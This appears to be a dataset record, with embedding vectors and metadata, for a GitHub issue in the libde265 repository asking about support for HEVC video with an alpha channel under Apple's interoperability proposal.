-0.00919668935239315, -0.016440317034721375, 0.013584894128143787, -0.018071988597512245, 0.019901437684893608, 0.010259747505187988, -0.005911715794354677, -0.003220077371224761, -0.018764212727546692, 0.006026056129485369, -0.0050062621012330055, 0.007354878820478916, -0.006922238972038031, 0.0017506466247141361, 0.008016199804842472, 0.00916578620672226, -0.023634502664208412, 0.004666330758482218, -0.012744336389005184, 0.01003106590360403, 0.016032399609684944, 0.005460534244775772, -0.0042738644406199455, 0.02578533999621868, 0.0010398810263723135, -0.0028801457956433296, -0.0059518893249332905, 0.011650375090539455, -0.002586568705737591, -0.0364406444132328, 0.032855913043022156, 0.00407917657867074, -0.0211251899600029, 0.0017630077200010419, 0.008387033827602863, 0.009864190593361855, 0.010346274822950363, -0.006372168194502592, -0.0031613619066774845, -0.020272271707654, -0.006149667780846357, -0.004292406141757965, -0.015426703728735447, 0.038097038865089417, 0.011786348186433315, 0.008331408724188805, -0.026798954233527184, -0.008485923521220684, -0.025154922157526016, -0.010809818282723427, -0.02033407799899578, -0.0009649415733292699, 0.0012770603643730283, 0.00046856451081112027, -0.023696307092905045, 0.009666412137448788, -0.018764212727546692, -0.00911634135991335, 0.01437600702047348, -0.012188085354864597, -0.028875626623630524, -0.015834622085094452, -0.024067141115665436, 0.00822633970528841, -0.0017830946017056704, 0.004752859007567167, 0.002079762052744627, -0.0070025864988565445, 0.00867134053260088, 0.008553910069167614, -0.015154759399592876, 0.012256071902811527, 0.010197941213846207, -0.007509393151849508, -0.00042530050268396735, 0.0038844887167215347, 0.012781419791281223, -0.0031706327572464943, 0.009752940386533737, -0.012608364224433899, 0.008183075115084648, 0.00029782624915242195, -0.008294325321912766, 0.015241286717355251, -0.0040606348775327206, -0.018690045922994614, 0.005664492957293987, 0.010482247918844223, 0.029147570952773094, 0.03498202934861183, -0.001963876187801361, 0.00021129826200194657, 0.012218988500535488, -0.00499081052839756, -0.02343672327697277, 0.03342452645301819, 0.006115674506872892, -0.015241286717355251, -0.003921572118997574, 0.0033715013414621353, -0.018826017156243324, -0.02885090373456478, 0.015043509192764759, -0.029716182500123978, 0.022361304610967636, 0.008164533413946629, 0.001753736869432032, -0.01351072732359171, -0.01155148632824421, 0.02749117836356163, 0.01161947287619114, -0.0007466902025043964, 0.00015123083721846342, 0.021001579239964485, -0.010370997712016106, 0.0007810696261003613, 0.0020581299904733896, 0.007082934025675058, -0.004323309287428856, -0.008220158517360687, 0.004329489544034004, 0.0019376089330762625, -0.0009085438796319067, 0.00020125483570154756, -0.013634338974952698, 0.01437600702047348, 0.013770311139523983, 0.0006895199185237288, -0.0028106144163757563, 0.012336418963968754, 0.007997658103704453, -0.0072992537170648575, 0.010568775236606598, 0.003223167499527335, 0.01437600702047348, -0.006909877993166447, -0.014190590009093285, 0.005815916694700718, -0.02395589090883732, -0.0005917896050959826, -0.020383521914482117, -0.0002908731112256646, 0.012200446799397469, 0.013399477116763592, 0.01707073673605919, -0.021001579239964485, 0.00036233593709766865, -0.021248802542686462, 0.010482247918844223, 0.008121269755065441, -0.009882732294499874, -0.009066897444427013, 0.03478424996137619, -0.02657645381987095, -0.0004751313535962254, -0.029988128691911697, -0.005766472313553095, 0.03777564689517021 ]
1,747
null
null
null
null
null
null
null
null
null
[ "strukturag", "libde265" ]
In May 2019 Apple released and implemented a proposal for alpha channel support (so called transparent videos/movies) encoded in HEVC. Currently, it seems only Apple tools (avconvert and Compressor) support this format. ffmpeg with the current libx265 fails while encoding as it does not support a pixel format with alpha support (ffmpeg relevant ticket https://trac.ffmpeg.org/ticket/7965 ). Is it planned or has it been evaluated providing support for videos with alpha? Or is it something that can already be accomplished with command line flags? https://bitbucket.org/multicoreware/x265_git/issues/attachments/577/multicoreware/x265_git/1604508977.83/577/HEVC-Video-with-Alpha-Interoperability-Profile.pdf
Support for alpha/transparency per apple interoperability proposal
https://api.github.com/repos/strukturag/libde265/issues/288/comments
6
2021-03-12T02:34:00
2023-01-27T12:25:57Z
https://github.com/strukturag/libde265/issues/288
829,698,888
288
false
This is a GitHub Issue repo:libde265 owner:strukturag Title : Support for alpha/transparency per apple interoperability proposal Issue date: --- start body --- In May 2019 Apple released and implemented a proposal for alpha channel support (so called transparent videos/movies) encoded in HEVC. Currently, it seems only Apple tools (avconvert and Compressor) support this format. ffmpeg with the current libx265 fails while encoding as it does not support a pixel format with alpha support (ffmpeg relevant ticket https://trac.ffmpeg.org/ticket/7965 ). Is it planned or has it been evaluated providing support for videos with alpha? Or is it something that can already be accomplished with command line flags? https://bitbucket.org/multicoreware/x265_git/issues/attachments/577/multicoreware/x265_git/1604508977.83/577/HEVC-Video-with-Alpha-Interoperability-Profile.pdf --- end body ---
894
[ -0.03068133443593979, 0.02004682458937168, -0.022926712408661842, 0.005756262224167585, -0.0019667523447424173, -0.0048852721229195595, 0.008330600336194038, 0.051051270216703415, -0.03419339284300804, 0.0027271127328276634, -0.0056684608571231365, 0.007761646993458271, -0.0026463354006409645, 0.03863263130187988, -0.03489580377936363, 0.03138374537229538, 0.011308825574815273, 0.019836101680994034, -0.024373678490519524, -0.001088737859390676, 0.000035230328649049625, -0.05301802232861519, -0.03129945695400238, 0.0039054080843925476, 0.021283069625496864, -0.012355418875813484, 0.005728166084736586, 0.003894871799275279, -0.02309529110789299, 0.0013161435490474105, 0.057007718831300735, 0.01272067241370678, -0.020749235525727272, 0.029529379680752754, 0.007824864238500595, 0.009833761490881443, 0.04987121745944023, 0.047426823526620865, -0.0011660030577331781, 0.006683445535600185, 0.0029870050493627787, -0.025778502225875854, -0.033153824508190155, 0.02989463321864605, -0.02025754749774933, -0.001739346538670361, 0.01487707532942295, 0.011350969783961773, -0.011709200218319893, -0.04413953796029091, 0.002149379113689065, -0.029529379680752754, -0.03427768126130104, -0.045853424817323685, -0.023235773667693138, -0.016661200672388077, 0.04869116470217705, 0.03877311572432518, -0.020468272268772125, 0.028461715206503868, -0.027042843401432037, 0.032479509711265564, 0.01638023555278778, 0.027183325961232185, -0.00447787344455719, -0.02749238722026348, -0.016871923580765724, -0.0032433851156383753, -0.06827440112829208, 0.015523293986916542, -0.015340667217969894, -0.036047760397195816, 0.024050571024417877, 0.045066721737384796, 0.008204166777431965, -0.007284007500857115, 0.011456332169473171, 0.007199718151241541, 0.01311402302235365, 0.04829781502485275, -0.020538512617349625, 0.049505963921546936, -0.05737297236919403, 0.02604541927576065, 0.010746896266937256, -0.0005939767579548061, -0.03523296117782593, -0.05726058781147003, -0.049646444618701935, 0.027028795331716537, -0.015031605958938599, 0.03998126462101936, 0.011315849609673023, -0.030007019639015198, -0.007206742186099291, 0.02461249940097332, -0.020749235525727272, -0.010767968371510506, -0.05546241253614426, -0.05071411281824112, -0.020538512617349625, 0.030035115778446198, 0.022926712408661842, 0.04222898185253143, -0.0024408800527453423, -0.020510416477918625, 0.007951298728585243, 0.005275110248476267, -0.018122216686606407, 0.07973775267601013, -0.017321467399597168, 0.0066413008607923985, -0.010479980148375034, -0.01461015921086073, -0.0004829079261980951, 0.03641301393508911, -0.04273471608757973, -0.0225052647292614, 0.0149613656103611, -0.00934909749776125, 0.008716926909983158, -0.011301801539957523, -0.04624677449464798, -0.004116131458431482, -0.010501052252948284, 0.04079606011509895, -0.004361975472420454, -0.037368293851614, 0.03211425244808197, -0.002123038750141859, -0.06063216179609299, 0.0027920857537537813, -0.027815496549010277, 0.02011706493794918, -0.01948489621281624, 0.031046587973833084, -0.00575275020673871, 0.06181221455335617, -0.03233902528882027, 0.005861624144017696, -0.006293606944382191, 0.00148472236469388, 0.02693045698106289, 0.028911257162690163, -0.0016313507221639156, 0.019793955609202385, 0.00020995519298594445, -0.003141535446047783, -0.0034944971557706594, -0.006072347518056631, 0.03124326467514038, -0.038379766047000885, 0.018051976338028908, -0.025666115805506706, 0.024429872632026672, 0.02826503850519657, 0.014343243092298508, -0.004253101535141468, 0.01380238588899374, -0.007319128140807152, -0.06321703642606735, -0.0036033710930496454, -0.02170451544225216, 0.010529148392379284, -0.004042378161102533, -0.02170451544225216, 0.013598687015473843, 0.002771013416349888, 0.0016612032195553184, 0.027843592688441277, -0.007817840203642845, 0.004049402195960283, 0.0035998590756207705, -0.025525635108351707, -0.05009599030017853, -0.0016770075308158994, 0.01945679821074009, 0.013191288337111473, -0.007199718151241541, -0.05313040688633919, -0.052006546407938004, 0.033856235444545746, 0.005338327493518591, 0.01630999520421028, 0.008323576301336288, -0.03781783580780029, 0.05844063684344292, -0.004144228063523769, 0.007062747608870268, -0.03815499320626259, 0.07698430120944977, 0.04107702523469925, 0.019864197820425034, -0.035542022436857224, 0.019217979162931442, -0.02528681419789791, 0.014947316609323025, -0.05723249167203903, 0.012811985798180103, -0.0112104881554842, 0.0075649721547961235, -0.02087567001581192, -0.02093186229467392, -0.019681571051478386, -0.03301334008574486, -0.03068133443593979, -0.007129476871341467, 0.033856235444545746, 0.045066721737384796, -0.037396389991045, -0.022870518267154694, -0.01791149377822876, -0.013015685603022575, 0.025033947080373764, 0.0047412775456905365, 0.0009175250306725502, -0.00965113379061222, 0.026986651122570038, 0.037480678409338, 0.008864433504641056, 0.018894869834184647, 0.012509948574006557, 0.017728867009282112, 0.0010483491932973266, -0.015930693596601486, 0.0035945908166468143, -0.0008349916897714138, -0.000016805744962766767, 0.006978458259254694, 0.01193397119641304, 0.030203694477677345, 0.008105828426778316, 0.0018438302213326097, -0.014055253937840462, 0.05742916464805603, -0.015972837805747986, 0.011386090889573097, -0.010725824162364006, 0.003968624863773584, -0.02750643528997898, -0.04571294039487839, 0.0009649377898313105, -0.002026457106694579, -0.011400138959288597, 0.0008415767806582153, 0.05096697807312012, 0.0006984604406170547, 0.062317948788404465, -0.05284944176673889, 0.03955981507897377, 0.0034646447747945786, -0.004569186829030514, -0.00788105744868517, 0.01716693677008152, -0.01799578219652176, 0.03784593194723129, 0.014806834980845451, 0.011772416532039642, -0.03259189426898956, -0.0370311364531517, 0.03939123824238777, -0.026424720883369446, -0.002319714054465294, -0.011969092302024364, -0.018080072477459908, -0.034024812281131744, 0.009826737456023693, -0.03180519491434097, -0.0029255440458655357, -0.021198779344558716, -0.025806598365306854, -0.011055957525968552, -0.0036560518201440573, 0.015874499455094337, -0.02028564363718033, 0.022055720910429955, -0.008450010791420937, -0.015790211036801338, 0.04857878014445305, 0.0034523524809628725, -0.025722309947013855, 0.038548342883586884, 0.038548342883586884, 0.027323808521032333, 0.005822991486638784, -0.018810579553246498, -0.01643642969429493, -0.024303438141942024, -0.04107702523469925, -0.02759072370827198, -0.003359283087775111, 0.04197611287236214, -0.04340903088450432, 0.0003872043453156948, -0.004562162794172764, 0.0002098454424412921, -0.019611328840255737, 0.04057128727436066, 0.020749235525727272, -0.020707091316580772, 0.015874499455094337, -0.015017557889223099, 0.012980564497411251, -0.03197377175092697, -0.04045890271663666, 0.06057596951723099, -0.037424486130476, 0.02841956913471222, 0.013437132351100445, -0.021226875483989716, 0.05605243891477585, -0.021943336352705956, -0.0003505472559481859, 0.008906577713787556, -0.014062278904020786, 0.025806598365306854, 0.010887378826737404, -0.011428235098719597, -0.04711776226758957, -0.014350267127156258, -0.016871923580765724, 0.06102551147341728, -0.0445890836417675, -0.005454225465655327, 0.0131069989874959, -0.0297260545194149, -0.02468273974955082, -0.015439004637300968, -0.020327789708971977, -0.00016221315308939666, -0.016029030084609985, -0.013928820379078388, 0.03059704601764679, -0.0036736121401190758, 0.011779440566897392, -0.0370592325925827, -0.03967220336198807, 0.008878481574356556, 0.011273704469203949, 0.0010650315089151263, 0.006002106238156557, -0.02313743531703949, 0.005566611420363188, 0.0048887841403484344, 0.00034001105814240873, -0.05655817314982414, -0.030737528577446938, -0.011976116336882114, 0.031608518213033676, 0.05161319673061371, 0.0008916236110962927, 0.012474828399717808, 0.03346288576722145, 0.00817606970667839, 0.01643642969429493, -0.02236478216946125, 0.0008494789362885058, -0.03304143622517586, 0.013022709637880325, 0.014891124330461025, 0.02535705640912056, -0.023544833064079285, 0.007663309574127197, 0.018389133736491203, -0.02677592635154724, 0.03233902528882027, -0.05152890831232071, 0.015045654959976673, -0.0036911724600940943, -0.04340903088450432, -0.013528445735573769, 0.024022473022341728, -0.018248651176691055, 0.039840780198574066, -0.021198779344558716, -0.009967219084501266, -0.033884331583976746, 0.018332939594984055, -0.003775461809709668, 0.023306014016270638, -0.04644344747066498, 0.003891359781846404, 0.0371154248714447, -0.036075856536626816, 0.005264574196189642, -0.0034874731209129095, 0.02010301686823368, -0.010697727091610432, -0.017672672867774963, -0.02313743531703949, -0.014736593700945377, 0.014251929707825184, -0.021844998002052307, -0.037003036588430405, -0.023390302434563637, 0.05894637480378151, -0.024795126169919968, -0.00380707043223083, 0.002300397725775838, -0.006574571598321199, 0.019709667190909386, -0.044364310801029205, 0.020777331665158272, 0.05315850302577019, -0.028700534254312515, 0.03666587918996811, -0.046499643474817276, -0.007859984412789345, 0.020398030057549477, 0.0025234133936464787, 0.018403181806206703, 0.005306718870997429, -0.030147502198815346, -0.021859046071767807, 0.014525869861245155, 0.007083820179104805, -0.014034181833267212, 0.00974947214126587, 0.012095525860786438, 0.017405757680535316, -0.0005830015288665891, -0.009637085720896721, -0.03214235231280327, -0.026368528604507446, 0.02239287830889225, -0.005099507514387369, 0.002960664452984929, -0.022154059261083603, 0.016239754855632782, -0.011301801539957523, 0.025862792506814003, -0.07226409763097763, 0.04526339843869209, -0.056389596313238144, 0.00899086706340313, 0.017293371260166168, -0.012074453756213188, -0.012060405686497688, 0.001007960527203977, -0.0047061569057404995, -0.03194567561149597, 0.012973540462553501, -0.028517907485365868, 0.012580189853906631, -0.014989461749792099, -0.02372746169567108, -0.024134859442710876, -0.004316318780183792, -0.004182860720902681, -0.01779910735785961, -0.009503628127276897, 0.06400373578071594, -0.01336689107120037, -0.019217979162931442, -0.021030200645327568, -0.024036521092057228, -0.013640831224620342, 0.014336219057440758, 0.06389135122299194, -0.0012221960350871086, -0.010283304378390312, 0.01789744570851326, 0.015087799169123173, -0.0025199013762176037, -0.004541090223938227, -0.018290795385837555, -0.062317948788404465, -0.030737528577446938, 0.0049168807454407215, -0.0006664129323326051, -0.0008446498541161418, 0.02317957952618599, 0.025202525779604912, 0.003478693077340722, 0.007361272815614939, 0.017405757680535316, 0.005043314769864082, -0.03891359642148018, -0.006915241479873657, -0.036272529512643814, 0.022687891498208046, -0.06198079138994217, 0.027211422100663185, -0.007557947654277086, 0.003331186482682824, -0.02022945135831833, 0.011062981560826302, 0.033238112926483154, 0.011582765728235245, 0.011196439154446125, 0.02310933917760849, -0.015087799169123173, 0.041357990354299545, -0.026368528604507446, -0.0027007723692804575, 0.010283304378390312, -0.006370872259140015, -0.0011168343480676413, 0.04619058221578598, 0.014680400490760803, -0.0013258017133921385, 0.023516736924648285, 0.01796768605709076, -0.04253803938627243, 0.020777331665158272, -0.002521657384932041, -0.011814561672508717, 0.023460544645786285, -0.024289390072226524, 0.004014281556010246, -0.04250994324684143, 0.007262934930622578, 0.021283069625496864, -0.020327789708971977, 0.028180750086903572, -0.006592132151126862, 0.019133688881993294, -0.007445562165230513, 0.008723950944840908, 0.015073751099407673, -0.01706860028207302, -0.014947316609323025, -0.006100444123148918, 0.03424958512187004, -0.018473422154784203, 0.030259888619184494, 0.007712478283792734, 0.0040177940391004086, -0.018965110182762146, -0.013254505582153797, -0.01047295518219471, -0.02374150976538658, 0.004239053465425968, 0.020482320338487625, 0.008407865650951862, 0.02230858989059925, 0.005461249500513077, 0.008070708252489567, -0.013851555064320564, -0.012538045644760132, -0.011807537637650967, 0.030765624716877937, -0.012882227078080177, -0.03970029950141907, -0.03410910442471504, -0.006690469570457935, 0.005570123437792063, 0.004558650776743889, -0.02008896879851818, 0.01564972847700119, 0.011435259133577347, -0.021212827414274216, 0.013556541875004768, 0.026635443791747093, -0.0025620460510253906, 0.011294777505099773, 0.0047763981856405735, 0.005152188241481781, -0.016759539023041725, -0.0224912166595459, -0.0012055137194693089, -0.01716693677008152, 0.007951298728585243, -0.008499179035425186, 0.029950827360153198, 0.01642238162457943, 0.00030093942768871784, 0.018094120547175407, -0.035429637879133224, -0.0004539334331639111, -0.0047728861682116985, -0.00818309374153614, 0.014364315196871758, 0.005721141584217548, -0.006297118961811066, 0.01151252444833517, 0.026494963094592094, 0.010648558847606182, -0.010894402861595154, -0.019751811400055885, -0.01046593114733696, -0.027955977246165276, -0.012769841589033604, 0.039054080843925476, 0.03301334008574486, -0.012622334994375706, -0.009433386847376823, -0.013970964588224888, -0.04394286498427391, -0.03068133443593979, -0.014778737910091877, 0.008864433504641056, -0.017504094168543816, -0.005348863545805216, 0.03826737776398659, -0.005243502091616392, -0.003108171047642827, 0.04023412987589836, 0.04335283860564232, -0.008499179035425186, -0.021283069625496864, 0.02079138159751892, -0.020369933918118477, 0.014947316609323025, 0.0093701696023345, -0.001275754882954061, -0.023291965946555138, 0.004330366849899292, -0.02753453142940998, 0.023306014016270638, -0.0035419100895524025, 0.020777331665158272, 0.04621867835521698, 0.007473658304661512, 0.009138373658061028, -0.005117068067193031, 0.01487707532942295, 0.013823458924889565, -0.008407865650951862, -0.02694450505077839, 0.02532895840704441, -0.02674783021211624, 0.02025754749774933, 0.03219854459166527, 0.04546007141470909, 0.01865604892373085, -0.012523997575044632, -0.006402480881661177, 0.00748068280518055, -0.0021054784301668406, -0.010149846784770489, 0.04543197527527809, -0.0014548698673024774, -0.004579722881317139, -0.007705454248934984, -0.03191757947206497, 0.01005853246897459, -0.015031605958938599, 0.017728867009282112, 0.012882227078080177, 0.009630061686038971, -0.026382576674222946, -0.014048229902982712, 0.046752508729696274, -0.01373916957527399, -0.006697493605315685, 0.007178645581007004, 0.010922499001026154, -0.0049941460601985455, -0.0007406051154248416, -0.018318891525268555, -0.03124326467514038, -0.016225706785917282, 0.01865604892373085, 0.019667522981762886, -0.0297260545194149, 0.06361038982868195, 0.017728867009282112, -0.009580893442034721, -0.02466869167983532, -0.018346989527344704, 0.04638725519180298, 0.0015286230482161045, -0.0034347923938184977, 0.01376024167984724, 0.02458440326154232, 0.026368528604507446, -0.022125963121652603, 0.007154061459004879, -0.011119173839688301, -0.0013749705394729972, -0.016619056463241577, 0.037340197712183, 0.018417229875922203, 0.003218800760805607, 0.011379066854715347, 0.025174427777528763, 0.02466869167983532, -0.007586044259369373, -0.0013881407212466002, 0.020454222336411476, 0.002288105431944132, -0.024120811372995377, -0.009475531056523323, -0.015439004637300968, -0.0040634507313370705, 0.007161085493862629, -0.011463356204330921, 0.0015057947020977736, -0.032451413571834564, 0.041498471051454544, 0.006967922206968069, -0.0036384917329996824, 0.03273237496614456, -0.01785530149936676, 0.020608752965927124, 0.009103253483772278, 0.016773587092757225, -0.0039896974340081215, -0.02753453142940998, 0.01653476618230343, 0.0186700988560915, -0.008766096085309982, 0.007852960377931595, -0.012636383064091206, 0.01706860028207302, 0.007361272815614939, 0.000021278130589053035, -0.04703347384929657, 0.021409502252936363, -0.003269725479185581, 0.015846403315663338, -0.004109107423573732, 0.03655349463224411, 0.0003037929709535092, -0.006939825601875782, 0.005264574196189642, -0.01639428548514843, -0.03526105731725693, -0.009173494763672352, -0.017363611608743668, 0.0023706387728452682, -0.029388897120952606, -0.009932098910212517, -0.01562163233757019, 0.0015022825682535768, 0.020538512617349625, 0.030035115778446198, 0.007543899584561586, 0.01080308947712183, -0.0056333402171730995, -0.027056891471147537, 0.002732380758970976, 0.018431277945637703, -0.0009640597854740918, 0.020538512617349625, -0.018192458897829056, 0.00501873018220067, 0.017742915078997612, 0.011842657811939716, -0.007719502318650484, 0.009496603161096573, -0.021254971623420715, -0.034614838659763336, 0.00814797356724739, -0.014792785979807377, -0.004347927402704954, 0.0299227312207222, -0.005496370140463114, -0.006862560287117958, 0.029529379680752754, -0.018122216686606407, 0.007003042846918106, -0.05461952090263367, -0.00117302720900625, 0.011702176183462143, 0.014778737910091877, -0.0047377655282616615, 0.012552093714475632, 0.017490046098828316, -0.003002809127792716, 0.001056251348927617, 0.01647857390344143, 0.028040267527103424, 0.04225707799196243, -0.015565439127385616, 0.009538748301565647, 0.02081947773694992, 0.029276512563228607, -0.03197377175092697, 0.006792319472879171, 0.006795831490308046, -0.01782720349729061, -0.024724885821342468, 0.0064551616087555885, 0.013296649791300297, -0.025862792506814003, 0.0008222604519687593, -0.0011317605385556817, 0.01379536185413599, -0.02907983586192131, 0.013704048469662666, -0.03781783580780029, 0.008752047084271908, -0.004797470755875111, -0.021339261904358864, 0.013921796344220638, -0.019232027232646942, 0.010606413707137108, 0.005222429521381855, 0.010135797783732414, 0.0033329427242279053, 0.016815731301903725, -0.012165767140686512, 0.016647152602672577, -0.009328024461865425, -0.0034347923938184977, 0.006974946241825819, -0.006848512217402458, -0.014806834980845451, 0.018908917903900146, 0.03534534573554993, 0.008105828426778316, -0.017405757680535316, -0.02004682458937168, 0.006311167497187853, -0.008506203070282936, -0.007838912308216095, -0.010283304378390312, 0.029473187401890755, -0.025581827387213707, -0.0032258247956633568, 0.04093654453754425, 0.003517325734719634, 0.022828374058008194, -0.015003509819507599, 0.013416060246527195, 0.007340200245380402, -0.020468272268772125, 0.05535002797842026, -0.024879416450858116, 0.011547645553946495, 0.013697024434804916, -0.026551155373454094, -0.02022945135831833, -0.002103722421452403, 0.007111916318535805, 0.006226878147572279, 0.01006555650383234, -0.016141416504979134, 0.005292670801281929, 0.018150312826037407, -0.0065359389409422874, 0.01189182698726654, -0.03301334008574486, 0.014378363266587257, -0.0012186840176582336, -0.017433853819966316, -0.038492150604724884, 0.0449262410402298, -0.010227111168205738, -0.0023284940980374813, -0.05161319673061371, -0.019049400463700294, 0.008372745476663113, -0.026312334463000298, 0.0034154760651290417, -0.012861154973506927, 0.006792319472879171, -0.007262934930622578, 0.016127368435263634, -0.005261062178760767, 0.03424958512187004, 0.029501283541321754, 0.012221960350871086, -0.0261718537658453, -0.039812684059143066, -0.03197377175092697, -0.014764689840376377, -0.02608756348490715, 0.02088971808552742, 0.015017557889223099, -0.04253803938627243, -0.028826968744397163, 0.01799578219652176, -0.008513227105140686, 0.021114490926265717, 0.006855536252260208, -0.022111915051937103, 0.01455396693199873, -0.04102083295583725, -0.006093419622629881, 0.017363611608743668, -0.024724885821342468, -0.03495199605822563, 0.011449307203292847, -0.02086162194609642, -0.018796531483530998, 0.001159857027232647, 0.018164360895752907, 0.023263869807124138, -0.01864200085401535, 0.003508545458316803, 0.02166237123310566, 0.029445091262459755, -0.026621395722031593, -0.022940760478377342, -0.015986885875463486, -0.033940523862838745, 0.0029817367903888226, 0.011674079112708569, 0.02610161155462265, 0.01628189906477928, 0.00593888945877552, 0.0029483723919838667, 0.02173261158168316, 0.0005272476118989289, -0.019723715260624886, -0.02673378214240074, -0.01945679821074009, -0.004836103413254023, -0.019765859469771385, 0.019541088491678238, 0.002291617449373007, -0.009953171014785767, -0.022252395749092102, 0.015003509819507599, 0.0031555837485939264, -0.009925074875354767, -0.016773587092757225, 0.01380238588899374, -0.02173261158168316, -0.015846403315663338, -0.031046587973833084, -0.02004682458937168, 0.01566377654671669, -0.01418168842792511, 0.019105592742562294, 0.007027626968920231, 0.040655579417943954, -0.0012704868568107486, 0.00748068280518055, -0.013437132351100445, 0.022533360868692398, -0.016113320365548134, -0.03051275573670864, -0.01635213941335678, 0.004793958738446236, -0.0007489462732337415, 0.006971434224396944, 0.0065710595808923244, -0.0009570356924086809, 0.03576679527759552, -0.014006085693836212, -0.014308122918009758, -0.03278857097029686, -0.021030200645327568, 0.027941929176449776, 0.010346521623432636, -0.04186372458934784, 0.018796531483530998, 0.033828139305114746, -0.01084523368626833, -0.02302504889667034, 0.022041672840714455, 0.014624207280576229, -0.025047995150089264, 0.0074244895949959755, -0.018684146925807, 0.00575977424159646, 0.01851556822657585, 0.014258953742682934, 0.012362442910671234, -0.0187262911349535, -0.013654880225658417, 0.011365017853677273, -0.019035352393984795, -0.01852961629629135, 0.022814325988292694, 0.0033382107503712177, -0.020608752965927124, -0.006799343507736921, -0.01650667004287243, -0.003459376748651266, -0.006774758920073509, -0.015158040449023247, -0.051809873431921005, -0.0007884569349698722, -0.05832825228571892, -0.01455396693199873, 0.030344177037477493, 0.013423084281384945, -0.013078901916742325, 0.029978923499584198, 0.025146331638097763, 0.006395456846803427, -0.0011317605385556817, -0.027464289218187332, -0.022730035707354546, -0.035429637879133224, -0.031018491834402084, -0.014975413680076599, 0.04756730794906616, -0.004319830797612667, 0.03534534573554993, -0.004822054877877235, -0.01151954848319292, 0.02170451544225216, -0.028180750086903572, -0.002628775080665946, -0.005008194129914045, 0.02687426470220089, -0.0033224064391106367, -0.02822289429605007, 0.015986885875463486, -0.0013380938908085227, -0.002261765068396926, -0.008133925497531891, 0.00008933796198107302, -0.037424486130476, -0.015902597457170486, -0.021283069625496864, 0.030765624716877937, 0.004695620853453875, -0.0006795831141062081, 0.03267618268728256, 0.01375321764498949, 0.022617651149630547, -0.018361037597060204, 0.013057829812169075, 0.005928352940827608, -0.004980097524821758, 0.016857875511050224, -0.03371575102210045, 0.0010009363759309053, -0.005373448133468628, 0.007410441525280476, -0.004625379573553801, 0.019527040421962738, -0.00667993351817131, 0.007747598923742771, 0.0186700988560915, -0.007895105518400669, -0.04189182072877884, 0.006047762930393219, 0.012552093714475632, -0.01999063231050968, 0.004354951437562704, 0.028798872604966164, 0.005542026832699776, -0.007747598923742771, -0.0029062277171760798, 0.018866773694753647, -0.014371339231729507, -0.003331186482682824, -0.018922965973615646, 0.010992740280926228, -0.036862555891275406, -0.0007125086849555373, 0.0014057010412216187, 0.045965809375047684, 0.009566844440996647, -0.030119406059384346, -0.02152188867330551, 0.0013846287038177252, 0.018023880198597908, -0.0031134390737861395, -0.0011449307203292847, -0.009103253483772278, -0.005468273535370827, -0.003627955447882414, 0.016871923580765724, 0.036918748170137405, -0.015453053638339043, 0.009854833595454693, 0.00856239628046751, -0.0038281427696347237, 0.006655348930507898, -0.0021405990701168776, -0.004558650776743889, 0.006321703549474478, -0.016871923580765724, -0.009250759147107601, -0.02825099043548107, -0.033238112926483154, -0.026452817022800446, -0.024205099791288376, 0.013900724239647388, 0.02006087265908718, 0.01705455221235752, 0.007006554864346981, -0.01704050414264202, -0.0028781311120837927, -0.0015716457273811102, 0.015368764288723469, -0.010297352448105812, 0.011196439154446125, -0.0073472242802381516, -0.014778737910091877, 0.0017955393996089697, -0.010789040476083755, -0.02024349942803383, 0.04256613925099373, -0.0030203694477677345, -0.03571060299873352, -0.0025690700858831406, -0.002258253050968051, -0.003057246096432209, 0.007712478283792734, -0.011182391084730625, -0.013675952330231667, 0.01933036558330059, -0.02396628074347973, -0.014483725652098656, -0.006247950252145529, 0.015523293986916542, -0.00001495368269388564, 0.052540380507707596, 0.0018016855465248227, -0.016169512644410133, 0.0023794190492480993, -0.007550923619419336, 0.0006440235301852226, 0.008442986756563187, 0.006943337619304657, -0.005187308881431818, -0.0047799102030694485, 0.02308124303817749, -0.0017419805517420173, 0.019260123372077942, 0.012643407098948956, 0.00688714487478137, 0.0013152655446901917, -0.008056660182774067, -0.015481149777770042, 0.0262139979749918, 0.01335986703634262, 0.02027159556746483, 0.021395454183220863, 0.011189415119588375, -0.01230624970048666, 0.016731442883610725, -0.028672438114881516, -0.041301798075437546, 0.004944976884871721, 0.009243735112249851, -0.010894402861595154, -0.04557245969772339, -0.005261062178760767, 0.005159212742000818, -0.005963473580777645, -0.0026077027432620525, -0.0016392528777942061, 0.04189182072877884, -0.01785530149936676, 0.0022564970422536135, -0.02466869167983532, -0.015565439127385616, -0.027436193078756332, 0.0017639308935031295, 0.004467337392270565, -0.008295480161905289, -0.016717394813895226, 0.04871926084160805, 0.030007019639015198, -0.002207328099757433, -0.007227814290672541, 0.015200184658169746, -0.015003509819507599, 0.0371997132897377, 0.020749235525727272, -0.00575275020673871, 0.011421211063861847, -0.01275579258799553, 0.03335049748420715, 0.02150784060359001, -0.024387728422880173, 0.01569187268614769, -0.005577147472649813, 0.008632637560367584, 0.006423553451895714, 0.006837976165115833, 0.0012485365150496364, -0.016745490953326225, 0.0065289149060845375, -0.007670333608984947, 0.007255910895764828, 0.016829779371619225, -0.008281432092189789, 0.01779910735785961, -0.012383515015244484, 0.003180168103426695, 0.0371154248714447, -0.016183560714125633, 0.007020602934062481, 0.03051275573670864, -0.001758662867359817, 0.04383047670125961, 0.015158040449023247, 0.0014856003690510988, 0.00447787344455719, -0.0022635210771113634, 0.0018210018752142787, -0.03337859362363815, -0.0020984543953090906, -0.0028465227223932743, -0.020426126196980476, 0.016197608783841133, 0.00596698559820652, 0.0023688827641308308, 0.018164360895752907, -0.016885973513126373, -0.002061577746644616, -0.010564269497990608, 0.006156636867672205, 0.017546240240335464, -0.011196439154446125, -0.006405992899090052, -0.001079079695045948, 0.03874501958489418, 0.017026454210281372, -0.005657924804836512, -0.009096229448914528, 0.013324745930731297, 0.012179815210402012, 0.008766096085309982, 0.005903768818825483, 0.009988292120397091, -0.02466869167983532, 0.008105828426778316, -0.020510416477918625, -0.014244905672967434, -0.005299694836139679, -0.007326152175664902, 0.007677357643842697, 0.026424720883369446, -0.024963704869151115, -0.0029852488078176975, 0.010487004183232784, 0.01081011351197958, -0.0032855297904461622, 0.006929289549589157, 0.002995785092934966, -0.026621395722031593, 0.012439708225429058, 0.009278856217861176, 0.023348158225417137, 0.04200420901179314, 0.010782016441226006, 0.031692806631326675, -0.0013512641889974475, 0.02767501398921013, -0.0024338557850569487, 0.005580659490078688, -0.02156403288245201, 0.017532192170619965, 0.0029079837258905172, -0.017700770869851112, 0.02091781422495842, 0.010908450931310654, 0.028489811345934868, 0.012847106903791428, -0.009489579126238823, -0.022828374058008194, -0.014792785979807377, 0.006188245490193367, -0.007038163486868143, -0.0017604188760742545, 